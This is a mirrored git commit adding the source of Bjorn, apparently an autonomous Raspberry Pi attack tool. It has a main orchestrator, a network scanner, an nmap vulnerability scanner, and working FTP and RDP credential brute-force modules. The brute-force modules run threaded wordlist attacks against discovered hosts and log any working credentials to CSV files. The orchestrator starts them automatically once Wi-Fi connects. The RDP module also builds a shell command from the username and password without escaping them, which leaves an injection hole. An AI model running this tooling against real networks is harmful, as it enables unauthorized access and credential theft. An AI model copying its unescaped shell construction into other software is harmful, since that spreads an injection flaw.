mirror of https://github.com/infinition/Bjorn.git synced 2024-11-11 22:38:39 +03:00

First Bjorn Commit !

This commit is contained in:
Fabien POLLY
2024-11-07 16:39:14 +01:00
parent 10ffdfa103
commit 5724ce6bb6
232 changed files with 12441 additions and 385 deletions

2
.gitattributes vendored Normal file

@@ -0,0 +1,2 @@
*.sh text eol=lf
*.py text eol=lf

158
Bjorn.py Normal file

@@ -0,0 +1,158 @@
# bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Functions:
# - handle_exit: Handles the termination of the main, display, and web server threads.
# - handle_exit_web: Handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and starts
# the display, Bjorn, and web server threads.
import threading
import signal
import logging
import time
import sys
import subprocess
from init_shared import shared_data
from display import Display, handle_exit_display
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from logger import Logger
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
def start_orchestrator(self):
"""Start the orchestrator thread."""
        self.is_wifi_connected()  # Refresh the Wi-Fi status before starting the orchestrator
        if self.wifi_connected:
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
@staticmethod
def start_display():
"""Start the display thread"""
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread.start()
return display_thread
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
if __name__ == "__main__":
logger.info("Starting threads")
try:
logger.info("Loading shared data config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Bjorn thread...")
bjorn = Bjorn(shared_data)
        shared_data.bjorn_instance = bjorn  # Assign the Bjorn instance to shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
        sys.exit(1)
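
For reference, the nmcli check in is_wifi_connected can be exercised in isolation. A minimal sketch using subprocess.run, assuming nmcli and NetworkManager are available, as the script above already requires:

import subprocess

def wifi_is_connected() -> bool:
    # In terse mode, nmcli prints one "yes"/"no" active flag per Wi-Fi device.
    result = subprocess.run(
        ["nmcli", "-t", "-f", "active", "dev", "wifi"],
        capture_output=True, text=True,
    )
    return "yes" in result.stdout

if __name__ == "__main__":
    print("Wi-Fi connected:", wifi_is_connected())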

1084
README.md

File diff suppressed because it is too large

0
__init__.py Normal file

20
actions/IDLE.py Normal file

@@ -0,0 +1,20 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
console = Console()
class IDLE:
def __init__(self, shared_data):
self.shared_data = shared_data
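
The b_class/b_module/b_status/b_port globals act as plugin metadata for the orchestrator. A hypothetical loader illustrating the convention (a sketch only; the project's real discovery logic lives in orchestrator.py, which is not part of this excerpt):

import importlib

def load_action(module_name: str, shared_data):
    # Hypothetical plugin loader built on the b_* metadata convention.
    module = importlib.import_module(f"actions.{module_name}")
    action_cls = getattr(module, module.b_class)   # e.g. "IDLE" -> class IDLE
    return action_cls(shared_data), module.b_port  # b_port may be None

# Usage: action, port = load_action("IDLE", shared_data)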

0
actions/__init__.py Normal file

190
actions/ftp_connector.py Normal file

@@ -0,0 +1,190 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
        total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
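
A per-credential check like ftp_connect above can be given an explicit timeout so a stalled server does not hang a worker thread. A minimal standard-library sketch (the 5-second timeout is an assumption, not taken from this commit):

from ftplib import FTP, error_perm

def try_ftp_login(host: str, user: str, password: str, timeout: float = 5.0) -> bool:
    # Returns True only if the server accepts the credentials.
    try:
        with FTP() as conn:
            conn.connect(host, 21, timeout=timeout)
            conn.login(user, password)
        return True
    except (error_perm, OSError):
        return False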

34
actions/log_standalone.py Normal file

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'
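
The Logger wrapper imported from logger.py is not part of this excerpt. A hypothetical minimal stand-in, compatible with the info/error/success calls used throughout these action scripts:

import logging

class Logger:
    # Hypothetical stand-in; the real implementation lives in logger.py (not shown here).
    SUCCESS = 25  # custom level between INFO (20) and WARNING (30)

    def __init__(self, name: str, level: int = logging.INFO):
        logging.addLevelName(self.SUCCESS, "SUCCESS")
        self._log = logging.getLogger(name)
        self._log.setLevel(level)
        if not self._log.handlers:
            self._log.addHandler(logging.StreamHandler())

    def debug(self, msg): self._log.debug(msg)
    def info(self, msg): self._log.info(msg)
    def warning(self, msg): self._log.warning(msg)
    def error(self, msg): self._log.error(msg)
    def success(self, msg): self._log.log(self.SUCCESS, msg)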

34
actions/log_standalone2.py Normal file

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

188
actions/nmap_vuln_scanner.py Normal file

@@ -0,0 +1,188 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
import os
import pandas as pd
import subprocess
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_port = None
b_parent = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
return combined_result if success else None
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
return 'success'
        else:
            return 'success'  # Treat a failed scan as success: each host only needs one vulnerability scan attempt
            # return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
else:
capture = False
return "; ".join(vulnerabilities)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
            # 'w' mode truncates any existing content before the new scan result is written
            with open(result_file, 'w') as file:
                file.write(scan_result)
logger.info(f"Results saved to {result_file}")
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")
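
The nmap command assembled in scan_vulnerabilities corresponds to the following standalone helper. A sketch assuming nmap and the vulners.nse script are installed, with "-T4" as a placeholder for the configured aggressivity value:

import subprocess

def vuln_scan(ip: str, ports: list[str], aggressivity: str = "-T4") -> str:
    # Mirrors the scanner's nmap call: service/version detection plus the
    # vulners NSE script, restricted to the given ports.
    cmd = ["nmap", aggressivity, "-sV", "--script", "vulners.nse",
           "-p", ",".join(ports), ip]
    return subprocess.run(cmd, capture_output=True, text=True).stdout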

198
actions/rdp_connector.py Normal file

@@ -0,0 +1,198 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
    def run_bruteforce(self, adresse_ip, port):
        self.load_scan_file() # Reload the scan file to get the latest IPs and ports
        # Look up the host's metadata before queueing work so the worker threads receive valid values
        mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
        hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
        total_tasks = len(self.users) * len(self.passwords)
        for user in self.users:
            for password in self.passwords:
                if self.shared_data.orchestrator_should_exit:
                    logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
                    return False, []
                self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
        success_flag = [False]
        threads = []
        with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
            task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

589
actions/scanning.py Normal file

@@ -0,0 +1,589 @@
#scanning.py
# This script performs a network scan to identify live hosts, their MAC addresses, and open ports.
# The results are saved to CSV files and displayed using Rich for enhanced visualization.
import os
import threading
import csv
import pandas as pd
import socket
import netifaces
import time
import glob
import logging
from datetime import datetime
from rich.console import Console
from rich.table import Table
from rich.text import Text
from rich.progress import Progress
from getmac import get_mac_address as gma
from shared import SharedData
from logger import Logger
import ipaddress
import nmap
logger = Logger(name="scanning.py", level=logging.DEBUG)
b_class = "NetworkScanner"
b_module = "scanning"
b_status = "network_scanner"
b_port = None
b_parent = None
b_priority = 1
class NetworkScanner:
"""
This class handles the entire network scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.logger = logger
self.displaying_csv = shared_data.displaying_csv
self.blacklistcheck = shared_data.blacklistcheck
self.mac_scan_blacklist = shared_data.mac_scan_blacklist
self.ip_scan_blacklist = shared_data.ip_scan_blacklist
self.console = Console()
self.lock = threading.Lock()
self.currentdir = shared_data.currentdir
        self.semaphore = threading.Semaphore(200) # Limit the number of active threads to 200
self.nm = nmap.PortScanner() # Initialize nmap.PortScanner()
self.running = False
def check_if_csv_scan_file_exists(self, csv_scan_file, csv_result_file, netkbfile):
"""
Checks and prepares the necessary CSV files for the scan.
"""
with self.lock:
try:
if not os.path.exists(os.path.dirname(csv_scan_file)):
os.makedirs(os.path.dirname(csv_scan_file))
if not os.path.exists(os.path.dirname(netkbfile)):
os.makedirs(os.path.dirname(netkbfile))
if os.path.exists(csv_scan_file):
os.remove(csv_scan_file)
if os.path.exists(csv_result_file):
os.remove(csv_result_file)
if not os.path.exists(netkbfile):
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['MAC Address', 'IPs', 'Hostnames', 'Alive', 'Ports'])
except Exception as e:
self.logger.error(f"Error in check_if_csv_scan_file_exists: {e}")
def get_current_timestamp(self):
"""
Returns the current timestamp in a specific format.
"""
return datetime.now().strftime("%Y%m%d_%H%M%S")
def ip_key(self, ip):
"""
Converts an IP address to a tuple of integers for sorting.
"""
if ip == "STANDALONE":
return (0, 0, 0, 0)
try:
return tuple(map(int, ip.split('.')))
except ValueError as e:
self.logger.error(f"Error in ip_key: {e}")
return (0, 0, 0, 0)
def sort_and_write_csv(self, csv_scan_file):
"""
Sorts the CSV file based on IP addresses and writes the sorted content back to the file.
"""
with self.lock:
try:
with open(csv_scan_file, 'r') as file:
lines = file.readlines()
sorted_lines = [lines[0]] + sorted(lines[1:], key=lambda x: self.ip_key(x.split(',')[0]))
with open(csv_scan_file, 'w') as file:
file.writelines(sorted_lines)
except Exception as e:
self.logger.error(f"Error in sort_and_write_csv: {e}")
class GetIpFromCsv:
"""
Helper class to retrieve IP addresses, hostnames, and MAC addresses from a CSV file.
"""
def __init__(self, outer_instance, csv_scan_file):
self.outer_instance = outer_instance
self.csv_scan_file = csv_scan_file
self.ip_list = []
self.hostname_list = []
self.mac_list = []
self.get_ip_from_csv()
def get_ip_from_csv(self):
"""
Reads IP addresses, hostnames, and MAC addresses from the CSV file.
"""
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'r') as csv_scan_file:
csv_reader = csv.reader(csv_scan_file)
next(csv_reader)
for row in csv_reader:
if row[0] == "STANDALONE" or row[1] == "STANDALONE" or row[2] == "STANDALONE":
continue
if not self.outer_instance.blacklistcheck or (row[2] not in self.outer_instance.mac_scan_blacklist and row[0] not in self.outer_instance.ip_scan_blacklist):
self.ip_list.append(row[0])
self.hostname_list.append(row[1])
self.mac_list.append(row[2])
except Exception as e:
self.outer_instance.logger.error(f"Error in get_ip_from_csv: {e}")
def update_netkb(self, netkbfile, netkb_data, alive_macs):
"""
Updates the net knowledge base (netkb) file with the scan results.
"""
with self.lock:
try:
netkb_entries = {}
existing_action_columns = []
# Read existing CSV file
if os.path.exists(netkbfile):
with open(netkbfile, 'r') as file:
reader = csv.DictReader(file)
existing_headers = reader.fieldnames
existing_action_columns = [header for header in existing_headers if header not in ["MAC Address", "IPs", "Hostnames", "Alive", "Ports"]]
for row in reader:
mac = row["MAC Address"]
ips = row["IPs"].split(';')
